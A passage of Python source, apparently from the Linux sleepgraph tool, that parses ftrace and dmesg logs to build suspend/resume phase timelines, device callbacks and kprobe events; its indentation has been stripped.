self.ftrace_line_fmt = self.ftrace_line_fmt_fg
elif(tracer == 'nop'):
self.ftrace_line_fmt = self.ftrace_line_fmt_nop
else:
doError('Invalid tracer format: [%s]' % tracer)
def stampInfo(self, line, sv):
if re.match(self.stampfmt, line):
self.stamp = line
return True
elif re.match(self.sysinfofmt, line):
self.sysinfo = line
return True
elif re.match(self.tstatfmt, line):
self.turbostat.append(line)
return True
elif re.match(self.wififmt, line):
self.wifi.append(line)
return True
elif re.match(self.testerrfmt, line):
self.testerror.append(line)
return True
elif re.match(self.firmwarefmt, line):
self.fwdata.append(line)
return True
elif(re.match(self.devpropfmt, line)):
self.parseDevprops(line, sv)
return True
elif(re.match(self.pinfofmt, line)):
self.parsePlatformInfo(line, sv)
return True
m = re.match(self.cmdlinefmt, line)
if m:
self.cmdline = m.group('cmd')
return True
m = re.match(self.tracertypefmt, line)
if(m):
self.setTracerType(m.group('t'))
return True
return False
def parseStamp(self, data, sv):
# global test data
m = re.match(self.stampfmt, self.stamp)
if not self.stamp or not m:
doError('data does not include the expected stamp')
data.stamp = {'time': '', 'host': '', 'mode': ''}
dt = datetime(int(m.group('y'))+2000, int(m.group('m')),
int(m.group('d')), int(m.group('H')), int(m.group('M')),
int(m.group('S')))
data.stamp['time'] = dt.strftime('%B %d %Y, %I:%M:%S %p')
data.stamp['host'] = m.group('host')
data.stamp['mode'] = m.group('mode')
data.stamp['kernel'] = m.group('kernel')
if re.match(self.sysinfofmt, self.sysinfo):
for f in self.sysinfo.split('|'):
if '#' in f:
continue
tmp = f.strip().split(':', 1)
key = tmp[0]
val = tmp[1]
data.stamp[key] = val
sv.hostname = data.stamp['host']
sv.suspendmode = data.stamp['mode']
if sv.suspendmode == 'freeze':
self.machinesuspend = 'timekeeping_freeze\[.*'
else:
self.machinesuspend = 'machine_suspend\[.*'
if sv.suspendmode == 'command' and sv.ftracefile != '':
modes = ['on', 'freeze', 'standby', 'mem', 'disk']
fp = sv.openlog(sv.ftracefile, 'r')
for line in fp:
m = re.match('.* machine_suspend\[(?P<mode>.*)\]', line)
if m and m.group('mode') in ['1', '2', '3', '4']:
sv.suspendmode = modes[int(m.group('mode'))]
data.stamp['mode'] = sv.suspendmode
break
fp.close()
sv.cmdline = self.cmdline
if not sv.stamp:
sv.stamp = data.stamp
# firmware data
if sv.suspendmode == 'mem' and len(self.fwdata) > data.testnumber:
m = re.match(self.firmwarefmt, self.fwdata[data.testnumber])
if m:
data.fwSuspend, data.fwResume = int(m.group('s')), int(m.group('r'))
if(data.fwSuspend > 0 or data.fwResume > 0):
data.fwValid = True
# turbostat data
if len(self.turbostat) > data.testnumber:
m = re.match(self.tstatfmt, self.turbostat[data.testnumber])
if m:
data.turbostat = m.group('t')
# wifi data
if len(self.wifi) > data.testnumber:
m = re.match(self.wififmt, self.wifi[data.testnumber])
if m:
data.wifi = {'dev': m.group('d'), 'stat': m.group('s'),
'time': float(m.group('t'))}
data.stamp['wifi'] = m.group('d')
# sleep mode enter errors
if len(self.testerror) > data.testnumber:
m = re.match(self.testerrfmt, self.testerror[data.testnumber])
if m:
data.enterfail = m.group('e')
def devprops(self, data):
props = dict()
devlist = data.split(';')
for dev in devlist:
f = dev.split(',')
if len(f) < 3:
continue
dev = f[0]
props[dev] = DevProps()
props[dev].altname = f[1]
if int(f[2]):
props[dev].isasync = True
else:
props[dev].isasync = False
return props
def parseDevprops(self, line, sv):
idx = line.index(': ') + 2
if idx >= len(line):
return
props = self.devprops(line[idx:])
if sv.suspendmode == 'command' and 'testcommandstring' in props:
sv.testcommand = props['testcommandstring'].altname
sv.devprops = props
def parsePlatformInfo(self, line, sv):
m = re.match(self.pinfofmt, line)
if not m:
return
name, info = m.group('val'), m.group('info')
if name == 'devinfo':
sv.devprops = self.devprops(sv.b64unzip(info))
return
elif name == 'testcmd':
sv.testcommand = info
return
field = info.split('|')
if len(field) < 2:
return
cmdline = field[0].strip()
output = sv.b64unzip(field[1].strip())
sv.platinfo.append([name, cmdline, output])
# Class: TestRun
# Description:
# A container for a suspend/resume test run. This is necessary as
# there could be more than one, and they need to be separate.
class TestRun:
def __init__(self, dataobj):
self.data = dataobj
self.ftemp = dict()
self.ttemp = dict()
class ProcessMonitor:
def __init__(self):
self.proclist = dict()
self.running = False
def procstat(self):
c = ['cat /proc/[1-9]*/stat 2>/dev/null']
process = Popen(c, shell=True, stdout=PIPE)
running = dict()
for line in process.stdout:
data = ascii(line).split()
pid = data[0]
name = re.sub('[()]', '', data[1])
user = int(data[13])
kern = int(data[14])
kjiff = ujiff = 0
if pid not in self.proclist:
self.proclist[pid] = {'name' : name, 'user' : user, 'kern' : kern}
else:
val = self.proclist[pid]
ujiff = user - val['user']
kjiff = kern - val['kern']
val['user'] = user
val['kern'] = kern
if ujiff > 0 or kjiff > 0:
running[pid] = ujiff + kjiff
process.wait()
out = ''
for pid in running:
jiffies = running[pid]
val = self.proclist[pid]
if out:
out += ','
out += '%s-%s %d' % (val['name'], pid, jiffies)
return 'ps - '+out
def processMonitor(self, tid):
while self.running:
out = self.procstat()
if out:
sysvals.fsetVal(out, 'trace_marker')
def start(self):
self.thread = Thread(target=self.processMonitor, args=(0,))
self.running = True
self.thread.start()
def stop(self):
self.running = False
# ----------------- FUNCTIONS --------------------
# Function: doesTraceLogHaveTraceEvents
# Description:
# Quickly determine if the ftrace log has all of the trace events,
# markers, and/or kprobes required for primary parsing.
def doesTraceLogHaveTraceEvents():
kpcheck = ['_cal: (', '_ret: (']
techeck = ['suspend_resume', 'device_pm_callback']
tmcheck = ['SUSPEND START', 'RESUME COMPLETE']
sysvals.usekprobes = False
fp = sysvals.openlog(sysvals.ftracefile, 'r')
for line in fp:
# check for kprobes
if not sysvals.usekprobes:
for i in kpcheck:
if i in line:
sysvals.usekprobes = True
# check for all necessary trace events
check = techeck[:]
for i in techeck:
if i in line:
check.remove(i)
techeck = check
# check for all necessary trace markers
check = tmcheck[:]
for i in tmcheck:
if i in line:
check.remove(i)
tmcheck = check
fp.close()
sysvals.usetraceevents = True if len(techeck) < 2 else False
sysvals.usetracemarkers = True if len(tmcheck) == 0 else False
# Function: appendIncompleteTraceLog
# Description:
# [deprecated for kernel 3.15 or newer]
# Adds callgraph data which lacks trace event data. This is only
# for timelines generated from 3.15 or older
# Arguments:
# testruns: the array of Data objects obtained from parseKernelLog
def appendIncompleteTraceLog(testruns):
# create TestRun vessels for ftrace parsing
testcnt = len(testruns)
testidx = 0
testrun = []
for data in testruns:
testrun.append(TestRun(data))
# extract the callgraph and traceevent data
sysvals.vprint('Analyzing the ftrace data (%s)...' % \
os.path.basename(sysvals.ftracefile))
tp = TestProps()
tf = sysvals.openlog(sysvals.ftracefile, 'r')
data = 0
for line in tf:
# remove any latent carriage returns
line = line.replace('\r\n', '')
if tp.stampInfo(line, sysvals):
continue
# parse only valid lines, if this is not one move on
m = re.match(tp.ftrace_line_fmt, line)
if(not m):
continue
# gather the basic message data from the line
m_time = m.group('time')
m_pid = m.group('pid')
m_msg = m.group('msg')
if(tp.cgformat):
m_param3 = m.group('dur')
else:
m_param3 = 'traceevent'
if(m_time and m_pid and m_msg):
t = FTraceLine(m_time, m_msg, m_param3)
pid = int(m_pid)
else:
continue
# the line should be a call, return, or event
if(not t.fcall and not t.freturn and not t.fevent):
continue
# look for the suspend start marker
if(t.startMarker()):
data = testrun[testidx].data
tp.parseStamp(data, sysvals)
data.setStart(t.time, t.name)
continue
if(not data):
continue
# find the end of resume
if(t.endMarker()):
data.setEnd(t.time, t.name)
testidx += 1
if(testidx >= testcnt):
break
continue
# trace event processing
if(t.fevent):
continue
# call/return processing
elif sysvals.usecallgraph:
# create a callgraph object for the data
if(pid not in testrun[testidx].ftemp):
testrun[testidx].ftemp[pid] = []
testrun[testidx].ftemp[pid].append(FTraceCallGraph(pid, sysvals))
# when the call is finished, see which device matches it
cg = testrun[testidx].ftemp[pid][-1]
res = cg.addLine(t)
if(res != 0):
testrun[testidx].ftemp[pid].append(FTraceCallGraph(pid, sysvals))
if(res == -1):
testrun[testidx].ftemp[pid][-1].addLine(t)
tf.close()
for test in testrun:
# add the callgraph data to the device hierarchy
for pid in test.ftemp:
for cg in test.ftemp[pid]:
if len(cg.list) < 1 or cg.invalid or (cg.end - cg.start == 0):
continue
if(not cg.postProcess()):
id = 'task %s cpu %s' % (pid, m.group('cpu'))
sysvals.vprint('Sanity check failed for '+\
id+', ignoring this callback')
continue
callstart = cg.start
callend = cg.end
for p in test.data.sortedPhases():
if(test.data.dmesg[p]['start'] <= callstart and
callstart <= test.data.dmesg[p]['end']):
list = test.data.dmesg[p]['list']
for devname in list:
dev = list[devname]
if(pid == dev['pid'] and
callstart <= dev['start'] and
callend >= dev['end']):
dev['ftrace'] = cg
break
# Function: parseTraceLog
# Description:
# Analyze an ftrace log output file generated from this app during
# the execution phase. Used when the ftrace log is the primary data source
# and includes the suspend_resume and device_pm_callback trace events
# The ftrace filename is taken from sysvals
# Output:
# An array of Data objects
def parseTraceLog(live=False):
sysvals.vprint('Analyzing the ftrace data (%s)...' % \
os.path.basename(sysvals.ftracefile))
if(os.path.exists(sysvals.ftracefile) == False):
doError('%s does not exist' % sysvals.ftracefile)
if not live:
sysvals.setupAllKprobes()
ksuscalls = ['ksys_sync', 'pm_prepare_console']
krescalls = ['pm_restore_console']
tracewatch = ['irq_wakeup']
if sysvals.usekprobes:
tracewatch += ['sync_filesystems', 'freeze_processes', 'syscore_suspend',
'syscore_resume', 'resume_console', 'thaw_processes', 'CPU_ON',
'CPU_OFF', 'acpi_suspend']
# extract the callgraph and traceevent data
s2idle_enter = hwsus = False
tp = TestProps()
testruns, testdata = [], []
testrun, data, limbo = 0, 0, True
tf = sysvals.openlog(sysvals.ftracefile, 'r')
phase = 'suspend_prepare'
for line in tf:
# remove any latent carriage returns
line = line.replace('\r\n', '')
if tp.stampInfo(line, sysvals):
continue
# ignore all other commented lines
if line[0] == '#':
continue
# ftrace line: parse only valid lines
m = re.match(tp.ftrace_line_fmt, line)
if(not m):
continue
# gather the basic message data from the line
m_time = m.group('time')
m_proc = m.group('proc')
m_pid = m.group('pid')
m_msg = m.group('msg')
if(tp.cgformat):
m_param3 = m.group('dur')
else:
m_param3 = 'traceevent'
if(m_time and m_pid and m_msg):
t = FTraceLine(m_time, m_msg, m_param3)
pid = int(m_pid)
else:
continue
# the line should be a call, return, or event
if(not t.fcall and not t.freturn and not t.fevent):
continue
# find the start of suspend
if(t.startMarker()):
data, limbo = Data(len(testdata)), False
testdata.append(data)
testrun = TestRun(data)
testruns.append(testrun)
tp.parseStamp(data, sysvals)
data.setStart(t.time, t.name)
data.first_suspend_prepare = True
phase = data.setPhase('suspend_prepare', t.time, True)
continue
if(not data or limbo):
continue
# process cpu exec line
if t.type == 'tracing_mark_write':
m = re.match(tp.procexecfmt, t.name)
if(m):
proclist = dict()
for ps in m.group('ps').split(','):
val = ps.split()
if not val:
continue
name = val[0].replace('--', '-')
proclist[name] = int(val[1])
data.pstl[t.time] = proclist
continue
# find the end of resume
if(t.endMarker()):
if data.tKernRes == 0:
data.tKernRes = t.time
data.handleEndMarker(t.time, t.name)
if(not sysvals.usetracemarkers):
# no trace markers? then quit and be sure to finish recording
# the event we used to trigger resume end
if('thaw_processes' in testrun.ttemp and len(testrun.ttemp['thaw_processes']) > 0):
# if an entry exists, assume this is its end
testrun.ttemp['thaw_processes'][-1]['end'] = t.time
limbo = True
continue
# trace event processing
if(t.fevent):
if(t.type == 'suspend_resume'):
# suspend_resume trace events have two types, begin and end
if(re.match('(?P<name>.*) begin$', t.name)):
isbegin = True
elif(re.match('(?P<name>.*) end$', t.name)):
isbegin = False
else:
continue
if '[' in t.name:
m = re.match('(?P<name>.*)\[.*', t.name)
else:
m = re.match('(?P<name>.*) .*', t.name)
name = m.group('name')
# ignore these events
if(name.split('[')[0] in tracewatch):
continue
# -- phase changes --
# start of kernel suspend
if(re.match('suspend_enter\[.*', t.name)):
if(isbegin and data.tKernSus == 0):
data.tKernSus = t.time
continue
# suspend_prepare start
elif(re.match('dpm_prepare\[.*', t.name)):
if isbegin and data.first_suspend_prepare:
data.first_suspend_prepare = False
if data.tKernSus == 0:
data.tKernSus = t.time
continue
phase = data.setPhase('suspend_prepare', t.time, isbegin)
continue
# suspend start
elif(re.match('dpm_suspend\[.*', t.name)):
phase = data.setPhase('suspend', t.time, isbegin)
continue
# suspend_late start
elif(re.match('dpm_suspend_late\[.*', t.name)):
phase = data.setPhase('suspend_late', t.time, isbegin)
continue
# suspend_noirq start
elif(re.match('dpm_suspend_noirq\[.*', t.name)):
phase = data.setPhase('suspend_noirq', t.time, isbegin)
continue
# suspend_machine/resume_machine
elif(re.match(tp.machinesuspend, t.name)):
lp = data.lastPhase()
if(isbegin):
hwsus = True
if lp.startswith('resume_machine'):
# trim out s2idle loops, track time trying to freeze
llp = data.lastPhase(2)
if llp.startswith('suspend_machine'):
if 'waking' not in data.dmesg[llp]:
data.dmesg[llp]['waking'] = [0, 0.0]
data.dmesg[llp]['waking'][0] += 1
data.dmesg[llp]['waking'][1] += \
t.time - data.dmesg[lp]['start']
data.currphase = ''
del data.dmesg[lp]
continue
phase = data.setPhase('suspend_machine', data.dmesg[lp]['end'], True)
data.setPhase(phase, t.time, False)
if data.tSuspended == 0:
data.tSuspended = t.time
else:
if lp.startswith('resume_machine'):
data.dmesg[lp]['end'] = t.time
continue
phase = data.setPhase('resume_machine', t.time, True)
if(sysvals.suspendmode in ['mem', 'disk']):
susp = phase.replace('resume', 'suspend')
if susp in data.dmesg:
data.dmesg[susp]['end'] = t.time
data.tSuspended = t.time
data.tResumed = t.time
continue
# resume_noirq start
elif(re.match('dpm_resume_noirq\[.*', t.name)):
phase = data.setPhase('resume_noirq', t.time, isbegin)
continue
# resume_early start
elif(re.match('dpm_resume_early\[.*', t.name)):
phase = data.setPhase('resume_early', t.time, isbegin)
continue
# resume start
elif(re.match('dpm_resume\[.*', t.name)):
phase = data.setPhase('resume', t.time, isbegin)
continue
# resume complete start
elif(re.match('dpm_complete\[.*', t.name)):
phase = data.setPhase('resume_complete', t.time, isbegin)
continue
# skip trace events inside devices calls
if(not data.isTraceEventOutsideDeviceCalls(pid, t.time)):
continue
# global events (outside device calls) are graphed
if(name not in testrun.ttemp):
testrun.ttemp[name] = []
# special handling for s2idle_enter
if name == 'machine_suspend':
if hwsus:
s2idle_enter = hwsus = False
elif s2idle_enter and not isbegin:
if(len(testrun.ttemp[name]) > 0):
testrun.ttemp[name][-1]['end'] = t.time
testrun.ttemp[name][-1]['loop'] += 1
elif not s2idle_enter and isbegin:
s2idle_enter = True
testrun.ttemp[name].append({'begin': t.time,
'end': t.time, 'pid': pid, 'loop': 0})
continue
if(isbegin):
# create a new list entry
testrun.ttemp[name].append(\
{'begin': t.time, 'end': t.time, 'pid': pid})
else:
if(len(testrun.ttemp[name]) > 0):
# if an entry exists, assume this is its end
testrun.ttemp[name][-1]['end'] = t.time
# device callback start
elif(t.type == 'device_pm_callback_start'):
if phase not in data.dmesg:
continue
m = re.match('(?P<drv>.*) (?P<d>.*), parent: *(?P<p>.*), .*',\
t.name);
if(not m):
continue
drv = m.group('drv')
n = m.group('d')
p = m.group('p')
if(n and p):
data.newAction(phase, n, pid, p, t.time, -1, drv)
if pid not in data.devpids:
data.devpids.append(pid)
# device callback finish
elif(t.type == 'device_pm_callback_end'):
if phase not in data.dmesg:
continue
m = re.match('(?P<drv>.*) (?P<d>.*), err.*', t.name);
if(not m):
continue
n = m.group('d')
dev = data.findDevice(phase, n)
if dev:
dev['length'] = t.time - dev['start']
dev['end'] = t.time
# kprobe event processing
elif(t.fkprobe):
kprobename = t.type
kprobedata = t.name
key = (kprobename, pid)
# displayname is generated from kprobe data
displayname = ''
if(t.fcall):
displayname = sysvals.kprobeDisplayName(kprobename, kprobedata)
if not displayname:
continue
if(key not in tp.ktemp):
tp.ktemp[key] = []
tp.ktemp[key].append({
'pid': pid,
'begin': t.time,
'end': -1,
'name': displayname,
'cdata': kprobedata,
'proc': m_proc,
})
# start of kernel resume
if(data.tKernSus == 0 and phase == 'suspend_prepare' \
and kprobename in ksuscalls):
data.tKernSus = t.time
elif(t.freturn):
if(key not in tp.ktemp) or len(tp.ktemp[key]) < 1:
continue
e = next((x for x in reversed(tp.ktemp[key]) if x['end'] < 0), 0)
if not e:
continue
e['end'] = t.time
e['rdata'] = kprobedata
# end of kernel resume
if(phase != 'suspend_prepare' and kprobename in krescalls):
if phase in data.dmesg:
data.dmesg[phase]['end'] = t.time
data.tKernRes = t.time
# callgraph processing
elif sysvals.usecallgraph:
# create a callgraph object for the data
key = (m_proc, pid)
if(key not in testrun.ftemp):
testrun.ftemp[key] = []
testrun.ftemp[key].append(FTraceCallGraph(pid, sysvals))
# when the call is finished, see which device matches it
cg = testrun.ftemp[key][-1]
res = cg.addLine(t)
if(res != 0):
testrun.ftemp[key].append(FTraceCallGraph(pid, sysvals))
if(res == -1):
testrun.ftemp[key][-1].addLine(t)
tf.close()
if len(testdata) < 1:
sysvals.vprint('WARNING: ftrace start marker is missing')
if data and not data.devicegroups:
sysvals.vprint('WARNING: ftrace end marker is missing')
data.handleEndMarker(t.time, t.name)
if sysvals.suspendmode == 'command':
for test in testruns:
for p in test.data.sortedPhases():
if p == 'suspend_prepare':
test.data.dmesg[p]['start'] = test.data.start
test.data.dmesg[p]['end'] = test.data.end
else:
test.data.dmesg[p]['start'] = test.data.end
test.data.dmesg[p]['end'] = test.data.end
test.data.tSuspended = test.data.end
test.data.tResumed = test.data.end
test.data.fwValid = False
# dev source and procmon events can be unreadable with mixed phase height
if sysvals.usedevsrc or sysvals.useprocmon:
sysvals.mixedphaseheight = False
# expand phase boundaries so there are no gaps
for data in testdata:
lp = data.sortedPhases()[0]
for p in data.sortedPhases():
if(p != lp and not ('machine' in p and 'machine' in lp)):
data.dmesg[lp]['end'] = data.dmesg[p]['start']
lp = p
for i in range(len(testruns)):
test = testruns[i]
data = test.data
# find the total time range for this test (begin, end)
tlb, tle = data.start, data.end
if i < len(testruns) - 1:
tle = testruns[i+1].data.start
# add the process usage data to the timeline
if sysvals.useprocmon:
data.createProcessUsageEvents()
# add the traceevent data to the device hierarchy
if(sysvals.usetraceevents):
# add actual trace funcs
for name in sorted(test.ttemp):
for event in test.ttemp[name]:
if event['end'] - event['begin'] <= 0:
continue
title = name
if name == 'machine_suspend' and 'loop' in event:
title = 's2idle_enter_%dx' % event['loop']
data.newActionGlobal(title, event['begin'], event['end'], event['pid'])
# add the kprobe based virtual tracefuncs as actual devices
for key in sorted(tp.ktemp):
name, pid = key
if name not in sysvals.tracefuncs:
continue
if pid not in data.devpids:
data.devpids.append(pid)
for e in tp.ktemp[key]:
kb, ke = e['begin'], e['end']
if ke - kb < 0.000001 or tlb > kb or tle <= kb:
continue
color = sysvals.kprobeColor(name)
data.newActionGlobal(e['name'], kb, ke, pid, color)
# add config base kprobes and dev kprobes
if sysvals.usedevsrc:
for key in sorted(tp.ktemp):
name, pid = key
if name in sysvals.tracefuncs or name not in sysvals.dev_tracefuncs:
continue
for e in tp.ktemp[key]:
kb, ke = e['begin'], e['end']
if ke - kb < 0.000001 or tlb > kb or tle <= kb:
continue
data.addDeviceFunctionCall(e['name'], name, e['proc'], pid, kb,
ke, e['cdata'], e['rdata'])
if sysvals.usecallgraph:
# add the callgraph data to the device hierarchy
sortlist = dict()
for key in sorted(test.ftemp):
proc, pid = key
for cg in test.ftemp[key]:
if len(cg.list) < 1 or cg.invalid or (cg.end - cg.start == 0):
continue
if(not cg.postProcess()):
id = 'task %s' % (pid)
sysvals.vprint('Sanity check failed for '+\
id+', ignoring this callback')
continue
# match cg data to devices
devname = ''
if sysvals.suspendmode != 'command':
devname = cg.deviceMatch(pid, data)
if not devname:
sortkey = '%f%f%d' % (cg.start, cg.end, pid)
sortlist[sortkey] = cg
elif len(cg.list) > 1000000 and cg.name != sysvals.ftopfunc:
sysvals.vprint('WARNING: the callgraph for %s is massive (%d lines)' %\
(devname, len(cg.list)))
# create blocks for orphan cg data
for sortkey in sorted(sortlist):
cg = sortlist[sortkey]
name = cg.name
if sysvals.isCallgraphFunc(name):
sysvals.vprint('Callgraph found for task %d: %.3fms, %s' % (cg.pid, (cg.end - cg.start)*1000, name))
cg.newActionFromFunction(data)
if sysvals.suspendmode == 'command':
return (testdata, '')
# fill in any missing phases
error = []
for data in testdata:
tn = '' if len(testdata) == 1 else ('%d' % (data.testnumber + 1))
terr = ''
phasedef = data.phasedef
lp = 'suspend_prepare'
for p in sorted(phasedef, key=lambda k:phasedef[k]['order']):
if p not in data.dmesg:
if not terr:
ph = p if 'machine' in p else lp
terr = '%s%s failed in %s phase' % (sysvals.suspendmode, tn, ph)
pprint('TEST%s FAILED: %s' % (tn, terr))
error.append(terr)
if data.tSuspended == 0:
data.tSuspended = data.dmesg[lp]['end']
if data.tResumed == 0:
data.tResumed = data.dmesg[lp]['end']
data.fwValid = False
sysvals.vprint('WARNING: phase "%s" is missing!' % p)
lp = p
if not terr and 'dev' in data.wifi and data.wifi['stat'] == 'timeout':
terr = '%s%s failed in wifi_resume <i>(%s %.0fs timeout)</i>' % \
(sysvals.suspendmode, tn, data.wifi['dev'], data.wifi['time'])
error.append(terr)
if not terr and data.enterfail:
pprint('test%s FAILED: enter %s failed with %s' % (tn, sysvals.suspendmode, data.enterfail))
terr = 'test%s failed to enter %s mode' % (tn, sysvals.suspendmode)
error.append(terr)
if data.tSuspended == 0:
data.tSuspended = data.tKernRes
if data.tResumed == 0:
data.tResumed = data.tSuspended
if(len(sysvals.devicefilter) > 0):
data.deviceFilter(sysvals.devicefilter)
data.fixupInitcallsThatDidntReturn()
if sysvals.usedevsrc:
data.optimizeDevSrc()
# x2: merge any overlapping devices between test runs
if sysvals.usedevsrc and len(testdata) > 1:
tc = len(testdata)
for i in range(tc - 1):
devlist = testdata[i].overflowDevices()
for j in range(i + 1, tc):
testdata[j].mergeOverlapDevices(devlist)
testdata[0].stitchTouchingThreads(testdata[1:])
return (testdata, ', '.join(error))
# Function: loadKernelLog
# Description:
# [deprecated for kernel 3.15.0 or newer]
# load the dmesg file into memory and fix up any ordering issues
# The dmesg filename is taken from sysvals
# Output:
# An array of empty Data objects with only their dmesgtext attributes set
def loadKernelLog():
sysvals.vprint('Analyzing the dmesg data (%s)...' % \
os.path.basename(sysvals.dmesgfile))
if(os.path.exists(sysvals.dmesgfile) == False):
doError('%s does not exist' % sysvals.dmesgfile)
# there can be multiple test runs in a single file
tp = TestProps()
tp.stamp = datetime.now().strftime('# suspend-%m%d%y-%H%M%S localhost mem unknown')
testruns = []
data = 0
lf = sysvals.openlog(sysvals.dmesgfile, 'r')
for line in lf:
line = line.replace('\r\n', '')
idx = line.find('[')
if idx > 1:
line = line[idx:]
if tp.stampInfo(line, sysvals):
continue
m = re.match('[ \t]*(\[ *)(?P<ktime>[0-9\.]*)(\]) (?P<msg>.*)', line)
if(not m):
continue
msg = m.group("msg")
if(re.match('PM: Syncing filesystems.*', msg)):
if(data):
testruns.append(data)
data = Data(len(testruns))
tp.parseStamp(data, sysvals)
if(not data):
continue
m = re.match('.* *(?P<k>[0-9]\.[0-9]{2}\.[0-9]-.*) .*', msg)
if(m):
sysvals.stamp['kernel'] = m.group('k')
m = re.match('PM: Preparing system for (?P<m>.*) sleep', msg)
if(m):
sysvals.stamp['mode'] = sysvals.suspendmode = m.group('m')
data.dmesgtext.append(line)
lf.close()
if data:
testruns.append(data)
if len(testruns) < 1:
doError('dmesg log has no suspend/resume data: %s' \
% sysvals.dmesgfile)
# fix lines with same timestamp/function with the call and return swapped
for data in testruns:
last = ''
for line in data.dmesgtext:
mc = re.match('.*(\[ *)(?P<t>[0-9\.]*)(\]) calling '+\
'(?P<f>.*)\+ @ .*, parent: .*', line)
mr = re.match('.*(\[ *)(?P<t>[0-9\.]*)(\]) call '+\
'(?P<f>.*)\+ returned .* after (?P<dt>.*) usecs', last)
if(mc and mr and (mc.group('t') == mr.group('t')) and
(mc.group('f') == mr.group('f'))):
i = data.dmesgtext.index(last)
j = data.dmesgtext.index(line)
data.dmesgtext[i] = line
data.dmesgtext[j] = last
last = line
return testruns
# Function: parseKernelLog
# Description:
# [deprecated for kernel 3.15.0 or newer]
# Analyse a dmesg log output file generated from this app during
# the execution phase. Create a set of device structures in memory
# for subsequent formatting in the html output file
# This call is only for legacy support on kernels where the ftrace
# data lacks the suspend_resume or device_pm_callbacks trace events.
# Arguments:
# data: an empty Data object (with dmesgtext) obtained from loadKernelLog
# Output:
# The filled Data object
def parseKernelLog(data):
phase = 'suspend_runtime'
if(data.fwValid):
sysvals.vprint('Firmware Suspend = %u ns, Firmware Resume = %u ns' % \
(data.fwSuspend, data.fwResume))
# dmesg phase match table
dm = {
'suspend_prepare': ['PM: Syncing filesystems.*'],
'suspend': ['PM: Entering [a-z]* sleep.*', 'Suspending console.*'],
'suspend_late': ['PM: suspend of devices complete after.*'],
'suspend_noirq': ['PM: late suspend of devices complete after.*'],
'suspend_machine': ['PM: noirq suspend of devices complete after.*'],
'resume_machine': ['ACPI: Low-level resume complete.*'],
'resume_noirq': ['ACPI: Waking up from system sleep state.*'],
'resume_early': ['PM: noirq resume of devices complete after.*'],
'resume': ['PM: early resume of devices complete after.*'],
'resume_complete': ['PM: resume of devices complete after.*'],
'post_resume': ['.*Restarting tasks \.\.\..*'],
}
if(sysvals.suspendmode == 'standby'):
dm['resume_machine'] = ['PM: Restoring platform NVS memory']
elif(sysvals.suspendmode == 'disk'):
dm['suspend_late'] = ['PM: freeze of devices complete after.*']
dm['suspend_noirq'] = ['PM: late freeze of devices complete after.*']
dm['suspend_machine'] = ['PM: noirq freeze of devices complete after.*']
dm['resume_machine'] = ['PM: Restoring platform NVS memory']
dm['resume_early'] = ['PM: noirq restore of devices complete after.*']
dm['resume'] = ['PM: early restore of devices complete after.*']
dm['resume_complete'] = ['PM: restore of devices complete after.*']
elif(sysvals.suspendmode == 'freeze'):
dm['resume_machine'] = ['ACPI: resume from mwait']
# action table (expected events that occur and show up in dmesg)
at = {
'sync_filesystems': {
'smsg': 'PM: Syncing filesystems.*',
'emsg': 'PM: Preparing system for mem sleep.*' },
'freeze_user_processes': {
'smsg': 'Freezing user space processes .*',
'emsg': 'Freezing remaining freezable tasks.*' },
'freeze_tasks': {
'smsg': 'Freezing remaining freezable tasks.*',
'emsg': 'PM: Entering (?P<mode>[a-z,A-Z]*) sleep.*' },
'ACPI prepare': {
'smsg': 'ACPI: Preparing to enter system sleep state.*',
'emsg': 'PM: Saving platform NVS memory.*' },
'PM vns': {
'smsg': 'PM: Saving platform NVS memory.*',
'emsg': 'Disabling non-boot CPUs .*' },
}
t0 = -1.0
cpu_start = -1.0
prevktime = -1.0
actions = dict()
for line in data.dmesgtext:
# parse each dmesg line into the time and message
m = re.match('[ \t]*(\[ *)(?P<ktime>[0-9\.]*)(\]) (?P<msg>.*)', line)
if(m):
val = m.group('ktime')
try:
ktime = float(val)
except:
continue
msg = m.group('msg')
# initialize data start to first line time
if t0 < 0:
data.setStart(ktime)
t0 = ktime
else:
continue
# check for a phase change line
phasechange = False
for p in dm:
for s in dm[p]:
if(re.match(s, msg)):
phasechange, phase = True, p
break
# hack for determining resume_machine end for freeze
if(not sysvals.usetraceevents and sysvals.suspendmode == 'freeze' \
and phase == 'resume_machine' and \
re.match('calling (?P<f>.*)\+ @ .*, parent: .*', msg)):
data.setPhase(phase, ktime, False)
phase = 'resume_noirq'
data.setPhase(phase, ktime, True)
if phasechange:
if phase == 'suspend_prepare':
data.setPhase(phase, ktime, True)
data.setStart(ktime)
data.tKernSus = ktime
elif phase == 'suspend':
lp = data.lastPhase()
if lp:
data.setPhase(lp, ktime, False)
data.setPhase(phase, ktime, True)
elif phase == 'suspend_late':
lp = data.lastPhase()
if lp:
data.setPhase(lp, ktime, False)
data.setPhase(phase, ktime, True)
elif phase == 'suspend_noirq':
lp = data.lastPhase()
if lp:
data.setPhase(lp, ktime, False)
data.setPhase(phase, ktime, True)
elif phase == 'suspend_machine':
lp = data.lastPhase()
if lp:
data.setPhase(lp, ktime, False)
data.setPhase(phase, ktime, True)
elif phase == 'resume_machine':
lp = data.lastPhase()
if(sysvals.suspendmode in ['freeze', 'standby']):
data.tSuspended = prevktime
if lp:
data.setPhase(lp, prevktime, False)
else:
data.tSuspended = ktime
if lp:
data.setPhase(lp, prevktime, False)
data.tResumed = ktime
data.setPhase(phase, ktime, True)
elif phase == 'resume_noirq':
lp = data.lastPhase()
if lp:
data.setPhase(lp, ktime, False)
data.setPhase(phase, ktime, True)
elif phase == 'resume_early':
lp = data.lastPhase()
if lp:
data.setPhase(lp, ktime, False)
data.setPhase(phase, ktime, True)
elif phase == 'resume':
lp = data.lastPhase()
if lp:
data.setPhase(lp, ktime, False)
data.setPhase(phase, ktime, True)
elif phase == 'resume_complete':
lp = data.lastPhase()
if lp:
data.setPhase(lp, ktime, False)
data.setPhase(phase, ktime, True)
elif phase == 'post_resume':
lp = data.lastPhase()
if lp:
data.setPhase(lp, ktime, False)
data.setEnd(ktime)
data.tKernRes = ktime
break
# -- device callbacks --
if(phase in data.sortedPhases()):
# device init call
if(re.match('calling (?P<f>.*)\+ @ .*, parent: .*', msg)):
sm = re.match('calling (?P<f>.*)\+ @ '+\
'(?P<n>.*), parent: (?P<p>.*)', msg);
f = sm.group('f')
n = sm.group('n')
p = sm.group('p')
if(f and n and p):
data.newAction(phase, f, int(n), p, ktime, -1, '')
# device init return
elif(re.match('call (?P<f>.*)\+ returned .* after '+\
'(?P<t>.*) usecs', msg)):
sm = re.match('call (?P<f>.*)\+ returned .* after '+\
'(?P<t>.*) usecs(?P<a>.*)', msg);
f = sm.group('f')
